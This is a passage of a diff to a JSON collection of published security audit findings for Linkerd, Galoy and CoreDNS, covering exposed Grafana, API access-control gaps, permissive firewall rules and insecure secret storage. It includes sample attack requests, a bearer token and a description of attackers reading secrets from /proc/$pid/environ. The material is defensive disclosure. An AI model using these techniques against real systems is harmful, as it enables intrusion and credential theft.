- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "While security recommendations are included throughout Linkerd's technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as configuring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components.
Threat Scenario A user is unaware of security best practices and configures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the confidentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd.",
+ "title": "12. Outdated and internet-exposed Grafana instance ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "The Grafana admin panel is exposed over the internet. A management interface should not be exposed over the internet unless it is protected by a secondary authentication or access control mechanism; these mechanisms (e.g., IP address restrictions and VPN solutions) can mitigate the immediate risk to an application if it experiences a vulnerability. Moreover, the Grafana version deployed at grafana.freecorn.galoy.io is outdated and vulnerable to known security issues. Figure 12.1: The outdated Grafana version (8.2.1) with known security issues The version banner on the login page (figure 12.1) identifies the version as v8.2.1 ( 88622d7f09 ). This version has multiple moderate- and high-risk vulnerabilities. One of them, a path traversal vulnerability ( CVE-2021-43798 ), could enable an unauthenticated attacker to read the contents of arbitrary files on the server. However, we could not exploit this issue, and the Galoy team suggested that the code might have been patched through an upstream software deployment. Time constraints prevented us from reviewing all Grafana instances for potential vulnerabilities. We reviewed only the grafana.freecorn.galoy.io instance, but the recommendations in this finding apply to all deployed instances. Exploit Scenario An attacker identifies the name of a valid plugin installed and active on the instance. By using a specially crafted URL, the attacker can read the contents of any file on the server (as long as the Grafana process has permission to access the file). This enables the attacker to read sensitive configuration files and to engage in remote command execution on the server. Recommendations Short term, avoid exposing any Grafana instance over the internet, and restrict access to each instance's management interface. This will make the remote exploitation of any issues much more challenging. Long term, to avoid known security issues, review all deployed instances and ensure that they have been updated to the latest version. Additionally, review the Grafana log files for any indication of the attack described in CVE-2021-43798, which has been exploited in the wild. References List of publicly known vulnerabilities affecting recent versions of Grafana",
"labels": [
"Trail of Bits",
"Severity: High",
@@ -2962,9 +5710,9 @@
]
},
{
- "title": "3. 
CLI tool allows the use of insecure protocols when externally sourcing infrastructure definitions ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML definitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the system's use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she uses the CLI tool to fetch YAML definitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool.",
+ "title": "13. Incorrect processing of GET path parameter ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "If the value of the hidden path parameter in the GET request in figure 13.1 does not match the value in the appRoutesDef array, the request will cause an unhandled error (figure 13.2). The error occurs when the result of the serverRenderer function is undefined (line 21, figure 13.3), because the Invalid route path error is thrown in the call to the renderToStringWithData function (figure 13.4). GET / ?path=aaaa HTTP / 1.1 Host: localhost:3000 Figure 13.1: The HTTP request that triggers the error HTTP / 1.1 500 Internal Server Error // (...) ReferenceError: /Users/md/work/web-wallet/views/index.ejs:8 6| 7| >> 8| <%- pageData.title %> 9| 10| /colors.css\" /> 11| \" /> pageData is not defined at eval (\"web-wallet/views/index.ejs\":12:17) at index (web-wallet/node_modules/ejs/lib/ejs.js:692:17) at tryHandleCache (web-wallet/node_modules/ejs/lib/ejs.js:272:36) at View.exports.renderFile [as engine] (web-wallet/node_modules/ejs/lib/ejs.js:489:10) at View.render (web-wallet/node_modules/express/lib/view.js:135:8) at tryRender (web-wallet/node_modules/express/lib/application.js:640:10) at Function.render (web-wallet/node_modules/express/lib/application.js:592:3) at ServerResponse.render (web-wallet/node_modules/express/lib/response.js:1017:7) at web-wallet/src/server/ssr-router.ts:24:18 Figure 13.2: The HTTP response that shows the unhandled error 21 22 23 24 const vars = await serverRenderer(req)({ // undefined path: checkedRoutePath , }) return res.render( \"index\" , vars) // call when the vars is undefined Figure 13.3: src/server/ssr-router.ts#2124 10 export const serverRenderer = 11 (req: Request ) => 12 async ({ 13 path, 14 flowData, 15 }: { 16 path: RoutePath | AuthRoutePath 17 flowData?: KratosFlowData 18 }) => { 19 try { // (...) 43 const initialMarkup = await renderToStringWithData(App) // (...) 79 }) 80 } catch (err) { 81 console.error(err) 82 } Figure 13.4: src/renderers/server.tsx#1082 Exploit Scenario An attacker finds a way to inject malicious code into the hidden path parameter. This results in an open redirect vulnerability, enabling the attacker to redirect a victim to a malicious website.
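As a minimal sketch of the kind of handling the recommendations below describe (assuming an Express handler; the route values are illustrative, not the project's actual appRoutesDef), the parameter can be checked against the whitelist before any rendering happens:

import express from 'express'

// Illustrative whitelist standing in for the real appRoutesDef
const appRoutesDef = ['/', '/settings', '/transactions']

const app = express()
app.get('/', (req, res) => {
  const path = typeof req.query.path === 'string' ? req.query.path : '/'
  if (!appRoutesDef.includes(path)) {
    // Return a handled 4xx instead of letting the renderer throw a 500
    res.status(400).send('Invalid route path')
    return
  }
  // Safe to render: path is one of the known routes
  res.send('rendering ' + path)
})
app.listen(3000)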
Recommendations Short term, ensure that errors caused by an invalid path parameter value (one not included in the appRoutesDef whitelist) are handled correctly. A path parameter should not be processed if it is unused. Long term, use Burp Suite Professional with the Param Miner extension to scan the application for hidden parameters.",
"labels": [
"Trail of Bits",
"Severity: Low",
@@ -2972,9 +5720,9 @@
]
},
{
- "title": "4. Exposure of admin endpoint may affect application availability ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "User application sidecar proxies expose an admin endpoint that can be used for tasks such as shutting down the proxy server and collecting metrics. This endpoint is exposed to other components within the same pod. Therefore, an internal attacker could shut down the proxy, affecting the user application's availability. Furthermore, the admin endpoint lacks access controls, and the documentation does not warn of the risks of exposing the admin endpoint over the internet. Threat Scenario An infrastructure operator integrates Linkerd into his Kubernetes cluster. After a new user application is deployed, an underlying component within the same pod is compromised. An attacker with access to the compromised component can now laterally send a request to the admin endpoint used to shut down the proxy server, resulting in a denial of service of the user application. Recommendations Short term, employ authentication and authorization mechanisms behind the admin endpoint for proxy servers. Long term, document the risks of exposing critical components throughout Linkerd. For instance, it is important to note that exposing the admin endpoint on a user application proxy server may result in the exposure of a shutdown method, which could be leveraged in a denial-of-service attack.",
+ "title": "14. Discrepancies in API and GUI access controls ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "Although the Web Wallet's graphical user interface (GUI) does not allow changes to a username (figure 14.1), they can be made through the GraphQL userUpdateUsername mutation (figure 14.2). Figure 14.1: The lock icon on the Settings page indicates that it is not possible to change a username. POST /graphql HTTP / 2 Host: api.freecorn.galoy.io Content-Length: 345 Content-Type: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiI2MjI3ODYwMWJlOGViYWYxZWRmNDBhNDYiLCJ uZXR3b3JrIjoibWFpbm5ldCIsImlhdCI6MTY0Njc1NzU4NX0.ed2dk9gMQh5DJXCPpitj5wq78n0gFnmulRp 2KIXTVX0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Origin: https://wallet.freecorn.galoy.io { \"operationName\" : \"userUpdateUsername\" , \"variables\" :{ \"input\" :{ \"username\" : \"aaaaaaaaaaaa aaa\" }}, \"query\" : \" mutation userUpdateUsername($input: UserUpdateUsernameInput!) {\\n userUpdateUsername(input: $input) {\\n errors {\\n message\\n __typename\\n }\\n user {\\n id\\n username\\n __typename\\n }\\n __typename\\n }\\n} \" } HTTP/ 2 200 OK // (...)
{ \"data\" :{ \"userUpdateUsername\" :{ \"errors\" :[], \"user\" :{ \"id\" : \"04f01fb4-6328-5982-a39a-eeb 027a2ceef\" , \"username\" : \"aaaaaaaaaaaaaaa\" , \"__typename\" : \"User\" }, \"__typename\" : \"UserUpdat eUsernamePayload\" }}} Figure 14.2: The HTTP request-response cycle that enables username changes Exploit Scenario An attacker nds a discrepancy in the access controls of the GUI and API and is then able to use a sensitive method that the attacker should not be able to access. Recommendations Short term, avoid relying on client-side access controls. If the business logic of a functionality needs to be blocked, the block should be enforced in the server-side code. Long term, create an access control matrix for specic roles in the application and implement unit tests to ensure that appropriate access controls are enforced server-side.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2982,9 +5730,9 @@ ] }, { - "title": "12. Lack of centralized security best practices documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "While security recommendations are included throughout Linkerds technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as conguring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components. Threat Scenario A user is unaware of security best practices and congures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the condentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd. 44 Linkerd Threat Model", + "title": "15. Cloud SQL does not require TLS connections ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Terraforms declarative conguration le for the Cloud SQL instance does not indicate that PostgreSQL should enforce the use of Transport Layer Security (TLS) connections. Similarly, the Galoy solution does not use the Cloud SQL Auth proxy, which provides strong encryption and authentication using identity and access management. Because the database is exposed only in a virtual private cloud (VPC) network, this nding is of low severity. Exploit Scenario An attacker manages to eavesdrop on trac in the VPC network. If one of the database clients is miscongured, the attacker will be able to observe the database trac in plaintext. Recommendations Short term, congure Cloud SQL to require the use of TLS, or use the Cloud SQL Auth proxy. Long term, integrate Terrascan or another automated analysis tool into the workow to detect areas of improvement in the solution. References Congure SSL/TLS certicates , Cloud SQL documentation Connect from Google Kubernetes Engine , Cloud SQL documentation", "labels": [ "Trail of Bits", "Severity: Low", @@ -2992,9 +5740,9 @@ ] }, { - "title": "13. 
Unclear distinction between Linkerd and Linkerd2 in official Linkerd blog post guidance ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "The official Linkerd documentation clearly indicates the version of Linkerd that each document pertains to. For instance, documentation specific to Linkerd 1.x displays a message stating, This is not the latest version of Linkerd! However, guidance documented in blog post form on the same site does not provide such information. For instance, the first result of a Google search for Linkerd RBAC is a Linkerd blog post with guidance that is applicable only to linkerd 1.x, but there is no indication of this fact on the page. As a result, users who rely on these blog posts may misunderstand functionality in Linkerd versions 2.x and above. Threat Scenario A user searches for guidance on implementing various Linkerd features and finds documentation in blog posts that applies only to Linkerd version 1.x. As a result, he misunderstands Linkerd and its threat model, and he makes configuration mistakes that lead to security issues. Recommendations Short term, on Linkerd blog post pages, add indicators similar to the UI elements used in the Linkerd documentation to clearly indicate which version each guidance page applies to.",
+ "title": "16. Kubernetes node pools are not configured to auto-upgrade ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "The Galoy application uses Google Kubernetes Engine (GKE) node pools in which the auto-upgrade functionality is disabled. The auto-upgrade functionality helps keep the nodes in a Kubernetes cluster up to date with the Kubernetes version running on the cluster control plane, which Google updates on the user's behalf. Auto-upgrades also ensure that security updates are applied in a timely manner. Disabling this setting is not recommended by Google and could create a security risk if patching is not performed manually. 124 125 126 management { auto_repair = true auto_upgrade = false 127 } Figure 16.1: The auto-upgrade property is set to false . ( modules/platform/gcp/kube.tf#124127 ) Recommendations Short term, enable the auto-upgrade functionality to ensure that the nodes are kept up to date and that security patches are applied in a timely manner. Long term, remain up to date on the security features offered by Google Cloud. Integrate Terrascan or another automated tool into the development workflow to detect areas of improvement in the solution. References Auto-upgrading nodes , GKE documentation",
"labels": [
"Trail of Bits",
"Severity: Informational",
@@ -3002,9 +5750,9 @@
]
},
{
- "title": "14. Insufficient logging of outbound HTTPS calls ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "Linkerd operators can use the linkerd-viz extensions such as Prometheus and Grafana to collect metrics for the various proxies in a Linkerd infrastructure. However, these extensions do not collect metrics on outbound calls made by meshed applications. This limits the data that operators could use to conduct incident response procedures if compromised applications reach out to malicious external services and servers. Threat Scenario A meshed application running in the data plane is compromised as a result of a supply chain attack.
Because outbound HTTPS calls are not logged, Linkerd operators are unable to collect sufficient data to determine the impact of the vulnerability. Recommendations Short term, implement logging for outbound HTTPS connections. A GitHub issue to implement this recommendation already exists in the Linkerd repository but is still unresolved as of this writing. A. Methodology A threat modeling assessment is intended to provide a detailed analysis of the risks that an application faces at the structural and operational level; the goal is to assess the security of the application's design rather than its implementation details. During these assessments, engineers rely heavily on frequent meetings with the client's developers and on extensive reading of all documentation provided by the client. Code review and dynamic testing are not part of the threat modeling process, although engineers may occasionally consult the codebase or a live instance of the project to verify assumptions about the system's design. Engineers begin a threat modeling assessment by identifying the safeguards and guarantees that are critical to maintaining the target system's confidentiality, integrity, and availability. These security controls dictate the assessment's overarching scope and are determined by the requirements of the target system, which may relate to technical and reputational concerns, legal liability, and regulatory compliance. With these security controls in mind, engineers then divide the system into logical components (discrete elements that perform specific tasks) and establish trust zones around groups of components that lie within a common trust boundary. They identify the types of data handled by the system, enumerating the points at which data is sent, received, or stored by each component, as well as within and across trust boundaries. After establishing a detailed map of the target system's structure and data flows, engineers then identify threat actors: anyone who might threaten the target's security, including both malicious external actors and naive internal actors. Based on each threat actor's initial privileges and knowledge, engineers then trace threat actor paths through the system, determining the controls and data that a threat actor might be able to improperly access, as well as the safeguards that prevent such access. Any viable attack path discovered during this process constitutes a finding, which is paired with design recommendations to remediate gaps in the system's defenses. Finally, engineers rate the strength of each security control, indicating the general robustness of that type of defense against the full spectrum of possible attacks. These ratings are provided in the Security Control Maturity Evaluation table. B. Security Controls and Rating Criteria The following tables describe the security controls and rating criteria used in this report. Security Controls Category",
+ "title": "17. Overly permissive firewall rules ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "The VPC firewall configuration is overly permissive. This configuration, in conjunction with Google Cloud's default VPC rules, allows most communication between pods (figure 17.2), the bastion host (figure 17.3), and the public internet (figure 17.1).
92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 resource \"google_compute_firewall\" \"bastion_allow_all_inbound\" { project = local.project name = \"${local.name_prefix}-bastion-allow-ingress\" network = google_compute_network.vpc.self_link target_tags = [ local.tag ] direction = \"INGRESS\" source_ranges = [ \"0.0.0.0/0\" ] priority = \"1000\" allow { protocol = \"all\" } 107 } Figure 17.1: The bastion ingress rules allow incoming traffic on all protocols and ports from all addresses. ( modules/inception/gcp/bastion.tf#92107 ) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 resource \"google_compute_firewall\" \"intra_egress\" { project = local.project name = \"${local.name_prefix}-intra-cluster-egress\" description = \"Allow pods to communicate with each other and the master\" network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"EGRESS\" target_tags = [ local.cluster_name ] destination_ranges = [ local.master_ipv4_cidr_block , google_compute_subnetwork.cluster.ip_cidr_range , google_compute_subnetwork.cluster.secondary_ip_range[0].ip_cidr_range , ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } allow { protocol = \"ah\" } 23 } Figure 17.2: Pods can initiate connections to other pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#123 ) 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 resource \"google_compute_firewall\" \"dmz_nodes_ingress\" { name = \"${var.name_prefix}-bastion-nodes-ingress\" description = \"Allow ${var.name_prefix}-bastion to reach nodes\" project = local.project network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"INGRESS\" target_tags = [ local.cluster_name ] source_ranges = [ data.google_compute_subnetwork.dmz.ip_cidr_range , ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } 63 allow { protocol = \"ah\" } 64 } Figure 17.3: The bastion host can initiate connections to pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#4464 ) Exploit Scenario 1 An attacker gains access to a pod through a vulnerability in an application. He takes advantage of the unrestricted egress traffic and misconfigured pods to launch attacks against other services and pods in the network. Exploit Scenario 2 An attacker discovers a vulnerability on the Secure Shell server running on the bastion host. She exploits the vulnerability to gain network access to the Kubernetes cluster, which she can then use in additional attacks. Recommendations Short term, restrict both egress and ingress traffic to necessary protocols and ports. Document the expected network interactions across the components and check them against the implemented firewall rules. Long term, use services such as the Identity-Aware Proxy to avoid exposing hosts directly to the internet, and enable VPC Flow Logs for network monitoring. Additionally, integrate automated analysis tools such as tfsec into the development workflow to detect firewall issues early on. References Using IAP for TCP forwarding, Identity-Aware Proxy documentation",
"labels": [
"Trail of Bits",
"Severity: Medium",
@@ -3012,9 +5760,9 @@
]
},
{
- "title": "1. 
Risk of a race condition in the secondary plugin's setup function ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
- "body": "When it fails to transfer a zone from another server, the setup function of the secondary plugin prints a message to standard output. It obtains the name of the zone, stored in the variable n , from a loop and prints the message in an anonymous inner goroutine. However, the variable is not copied before being used in the anonymous goroutine, and the value that n points to is likely to change by the time the scheduler executes the goroutine. Consequently, the value of n will be inaccurate when it is printed. 19 24 26 27 29 30 31 32 35 36 40 func setup(c *caddy.Controller) error { // (...). for _, n := range zones.Names { // (...) c.OnStartup( func () error { z.StartupOnce.Do( func () { go func () { // (...) for { // (...) log.Warningf( \"All '%s' masters failed to transfer, retrying in %s: %s\" , n , dur.String(), err) // (...) 41 46 47 48 49 50 51 52 53 } } } z.Update() }() }) return nil }) Figure 1.1: The value of n is not copied before it is used in the anonymous goroutine and could be logged incorrectly. ( plugin/secondary/setup.go#L19-L53 ) Exploit Scenario An operator of a CoreDNS server enables the secondary plugin. The operator sees an error in the standard output indicating that the zone transfer failed. However, the error points to an invalid zone, making it more difficult for the operator to troubleshoot and fix the issue. Recommendations Short term, create a copy of n before it is used in the anonymous goroutine. See Appendix B for a proof of concept demonstrating this issue and an example of the fix. Long term, integrate the anonymous-race-condition Semgrep rule into the CI/CD pipeline to catch this type of race condition.",
+ "title": "18. Lack of uniform bucket-level access in Terraform state bucket ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "Uniform bucket-level access is not enabled in the bootstrap module bucket used to store the Terraform state. When enabled, this feature implements a uniform permission system, providing access at the bucket level rather than on a per-object basis. It also simplifies the access controls / permissions of a bucket, making them easier to manage and reason about. 1 2 3 4 5 6 7 8 resource \"google_storage_bucket\" \"tf_state\" { name = \"${local.name_prefix}-tf-state\" project = local.project location = local.tf_state_bucket_location versioning { enabled = true } force_destroy = local.tf_state_bucket_force_destroy 9 } Figure 18.1: The bucket definition lacks a uniform_bucket_level_access field set to true . ( modules/bootstrap/gcp/tf-state-bucket.tf#19 ) Exploit Scenario The permissions of some objects in a bucket are misconfigured. An attacker takes advantage of that fact to access the Terraform state. Recommendations Short term, enable uniform bucket-level access in this bucket. Long term, integrate automated analysis tools such as tfsec into the development workflow to identify any similar issues and areas of improvement.",
"labels": [
"Trail of Bits",
"Severity: Informational",
]
},
{
- "title": "2. Upstream errors captured in the grpc plugin are not returned ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
- "body": "In the ServeDNS implementation of the grpc plugin, upstream errors are captured in a loop.
However, once an error is captured in the upstreamErr variable, the function exits with a nil error; this is because there is no break statement forcing the function to exit the loop and to reach a return statement, at which point it would return the error value. The ServeDNS function of the forward plugin includes a similar but correct implementation. func (g *GRPC) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) ( int , error ) { // (...) upstreamErr = err // Check if the reply is correct; if not return FormErr. if !state.Match(ret) { debug.Hexdumpf(ret, \"Wrong reply for id: %d, %s %d\" , ret.Id, state.QName(), state.QType()) formerr := new (dns.Msg) formerr.SetRcode(state.Req, dns.RcodeFormatError) w.WriteMsg(formerr) return 0 , nil } w.WriteMsg(ret) return 0 , nil } if upstreamErr != nil { return dns.RcodeServerFailure, upstreamErr } Figure 2.1: plugin/secondary/setup.go#L19-L53 Exploit Scenario An operator runs CoreDNS with the grpc plugin. Upstream errors cause the gRPC functionality to fail. However, because the errors are not logged, the operator remains unaware of their root cause and has difficulty troubleshooting and remediating the issue. Recommendations Short term, correct the ineffectual assignment to ensure that errors captured by the plugin are returned. Long term, integrate ineffassign into the CI/CD pipeline to catch this and similar issues.",
+ "title": "19. Insecure storage of passwords ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "Galoy passwords are stored in configuration files and environment variables or passed in as command-line arguments. There are two issues with this method of storage: (1) the default keys are low entropy (figure 19.1) and (2) the fact that there are default keys in the first place suggests that users deploying components may not realize that they need to set passwords. 53 export BITCOINDRPCPASS=rpcpassword // (...) 68 export MONGODB_PASSWORD=password // (...) 79 export JWT_SECRET= \"jwt_secret\" Figure 19.1: An example configuration file with passwords ( .envrc#5379 ) Passing in sensitive values through environment variables (figure 19.2) increases the risk of a leak for several reasons: Environment variables are often dumped to external services through crash-logging mechanisms. All processes started by a user can read environment variables from the /proc/$pid/environ file. Attackers often use this ability to dump sensitive values passed in through environment variables (though this requires finding an arbitrary file read vulnerability in the application). An application can also overwrite the contents of a special /proc/$pid/environ file. However, overwriting the file is not as simple as calling setenv(SECRET, \"******\") , because runtimes copy environment variables upon initialization and then operate on the copy. To clear environment variables from that special environ file, one must either overwrite the stack data in which they are located or make a low-level prctl system call with the PR_SET_MM_ENV_START and PR_SET_MM_ENV_END flags enabled to change the memory address of the content the file is rendered from. 12 const jwtSecret = process.env.JWT_SECRET Figure 19.2: src/config/process.ts#12 Certain initialization commands take a password as a command-line argument (figures 19.3 and 19.4). If an attacker gained access to a user account on a system running the script, the attacker would also gain access to any password passed as a command-line argument.
65 66 command : [ '/bin/sh' ] args : 67 - '-c' 68 - | 69 70 71 72 73 if [ ! -f /root/.lnd/data/chain/bitcoin/${NETWORK}/admin.macaroon ]; then while ! test -f /root/.lnd/tls.cert; do sleep 1; done apk update; apk add expect /home/alpine/walletInit.exp ${NETWORK} $LND_PASS fi Figure 19.3: charts/lnd/templates/statefulset.yaml#6573 55 set PASSWORD [lindex $argv 1]; Figure 19.4: charts/lnd/templates/wallet-init-configmap.yaml#55 In Linux, all users can inspect other users' commands and their arguments. A user can enable the proc filesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specified group. However, in many Linux distributions, those options are not enabled by default. Recommendations Short term, take the following actions: Remove the default encryption keys and avoid using any one default key across installs. The user should be prompted to provide a key when deploying the Galoy application, or the application should generate a key using known-good cryptographically secure methods and provide it to the user for safekeeping. Avoid storing encryption keys in configuration files. Configuration files are often broadly readable or rendered as such accidentally. Long term, ensure that keys, passwords, and other sensitive data are never stored in plaintext in the filesystem, and avoid providing default values for that data. Also take the following steps: Document the risks of providing sensitive values through environment variables. Encourage developers to pass sensitive values through standard input or to use a launcher that can fetch them from a service like HashiCorp Vault. Allow developers to pass in those values from a configuration file, but document the fact that the configuration file should not be saved in backups, and provide a warning if the file has overly broad permissions when the program is started.",
"labels": [
"Trail of Bits",
"Severity: Medium",
"Difficulty: High"
]
},
{
"title": "20. Third-party container images are not version pinned ",
"html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
"body": "The continuous integration (CI) pipeline and Helm charts reference third-party components such as Docker registry images by named tags (or by no tag at all). Registry tags are not immutable; if an attacker compromised an image publisher's account, the pipeline or Kubernetes cluster could be provided a malicious container image. 87 - name : build-chain-dl-image 88 89 90 91 92 93 94 95 96 97 98 serial : true plan : - { get : chain-dl-image-def , trigger : true } - task : build privileged : true config : platform : linux image_resource : type : registry-image source : repository : vito/oci-build-task Figure 20.1: A third-party image referenced without an explicit tag ( ci/pipeline.yml#8798 ) 270 resource_types : 271 - name : terraform 272 273 274 275 type : docker-image source : repository : ljfranklin/terraform-resource tag : latest Figure 20.2: An image referenced by the latest tag ( ci/pipeline.yml#270275 ) Exploit Scenario An attacker gains access to a Docker Hub account hosting an image used in the CI pipeline. The attacker then tags a malicious container image and pushes it to Docker Hub. The CI pipeline retrieves the tagged malicious image and uses it to execute tasks. Recommendations Short term, refer to Docker images by SHA-256 digests to prevent the use of an incorrect or modified image. Long term, integrate automated tools such as Checkov into the development workflow to detect similar issues in the codebase.",
"labels": [
"Trail of Bits",
"Severity: Low",
"Difficulty: High"
]
},
{
"title": "3. Index-out-of-range panic in autopath plugin initialization ",
"html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
"body": "The following syntax is used to configure the autopath plugin: autopath [ZONE...] RESOLV-CONF The RESOLV-CONF parameter can point to a resolv.conf(5) configuration file or to another plugin, if the string in the resolv variable is prefixed with an @ symbol (e.g., @kubernetes). However, the autoPathParse function does not ensure that the length of the RESOLV-CONF parameter is greater than zero before dereferencing its first element and comparing it with the @ character. func autoPathParse(c *caddy.Controller) (*AutoPath, string , error ) { ap := &AutoPath{} mw := \"\" for c.Next() { zoneAndresolv := c.RemainingArgs() if len (zoneAndresolv) < 1 { return ap, \"\" , fmt.Errorf( \"no resolv-conf specified\" ) } resolv := zoneAndresolv[ len (zoneAndresolv)- 1 ] if resolv[ 0 ] == '@' { mw = resolv[ 1 :] Figure 3.1: The length of resolv may be zero when the first element is checked. ( plugin/autopath/setup.go#L45-L54 ) Specifying a configuration file with a zero-length RESOLV-CONF parameter, as shown in figure 3.2, would cause CoreDNS to panic.
0 autopath \"\" Figure 3.2: An autopath conguration with a zero-length RESOLV-CONF parameter panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/autopath.autoPathParse(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:53 +0x35c github.com/coredns/coredns/plugin/autopath.setup(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:16 +0x33 github.com/coredns/caddy.executeDirectives(0xc00029eb00, {0x7ffdc770671b, 0x8}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000543260, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc0003e8a00}, 0xc0003e8a00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc0003e8a00}, 0xc00029eb00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc0003e8a00}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 3.3: CoreDNS panics when loading the autopath conguration. Exploit Scenario An operator of a CoreDNS server provides an empty RESOLV-CONF parameter when conguring the autopath plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the resolv variable is a non-empty string before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe denial of service (DoS).", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "4. Index-out-of-range panic in forward plugin initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Initializing the forward plugin involves parsing the relevant conguration section. func parseStanza(c *caddy.Controller) (*Forward, error ) { f := New() if !c.Args(&f.from) { return f, c.ArgErr() } origFrom := f.from zones := plugin.Host(f.from).NormalizeExact() f.from = zones[ 0 ] // there can only be one here, won't work with non-octet reverse Figure 4.1: The length of the zones variable may be zero when the rst element is checked. ( plugin/forward/setup.go#L89-L97 ) An invalid conguration le for the forward plugin could cause the zones variable to have a length of zero. A Base64-encoded example of such a conguration le is shown in gure 4.2. 
